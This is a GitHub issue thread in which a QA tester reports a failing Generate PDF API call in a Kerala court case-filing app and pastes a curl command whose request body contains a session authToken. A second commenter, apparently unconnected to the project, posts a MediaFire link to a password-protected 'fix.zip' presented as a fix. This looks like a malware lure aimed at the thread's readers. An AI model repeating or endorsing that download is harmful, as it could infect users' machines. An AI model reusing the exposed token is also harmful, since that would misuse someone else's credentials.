### ISSUE TITLE
QA || [BLOCKER] Generate PDF API ERROR

### ISSUE THREAD

**Issue by bhuvanyuguru** [pucardotorg/Dristi_kerala#771]
Generate PDF API ERROR while filing a case
 
 
URL :  
https://dristi-kerala-qa.pucar.org/case/v1/_generatePdf?_=1724645047041
 
response: No response 
 
CURL : `curl "https://dristi-kerala-qa.pucar.org/case/v1/_generatePdf?_=1724645047041" ^
  -H "accept: application/json, text/plain, */*" ^
  -H "accept-language: en-US,en;q=0.8" ^
  -H "content-type: application/json;charset=UTF-8" ^
  -H "origin: https://dristi-kerala-qa.pucar.org" ^
  -H "priority: u=1, i" ^
  -H "referer: https://dristi-kerala-qa.pucar.org/digit-ui/citizen/dristi/home/file-case/case?caseId=2f937b91-c306-4495-b335-affd0ba6773b&selected=reviewCaseFile" ^
  -H ^"sec-ch-ua: ^\^"Chromium^\^";v=^\^"128^\^", ^\^"Not;A=Brand^\^";v=^\^"24^\^", ^\^"Brave^\^";v=^\^"128^\^"^" ^
  -H "sec-ch-ua-mobile: ?0" ^
  -H ^"sec-ch-ua-platform: ^\^"Windows^\^"^" ^
  -H "sec-fetch-dest: empty" ^
  -H "sec-fetch-mode: cors" ^
  -H "sec-fetch-site: same-origin" ^
  -H "sec-gpc: 1" ^
  -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" ^
  --data-raw ^"^{^\^"criteria^\^":^[^{^\^"caseId^\^":^\^"2f937b91-c306-4495-b335-affd0ba6773b^\^"^}^],^\^"tenantId^\^":^\^"kl^\^",^\^"RequestInfo^\^":^{^\^"apiId^\^":^\^"Rainmaker^\^",^\^"authToken^\^":^\^"5f7022b2-61bb-45be-85df-
7888f3fc7e97^\^",^\^"msgId^\^":^\^"1724645047040^|en_IN^\^",^\^"plainAccessRequest^\^":^{^}^}^}^"`

![Image](https://github.com/user-attachments/assets/8f20af71-9d8d-4c9b-95f3-3eb5a74d4063)

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bhuvanyuguru** [comment]
Resolved in QA
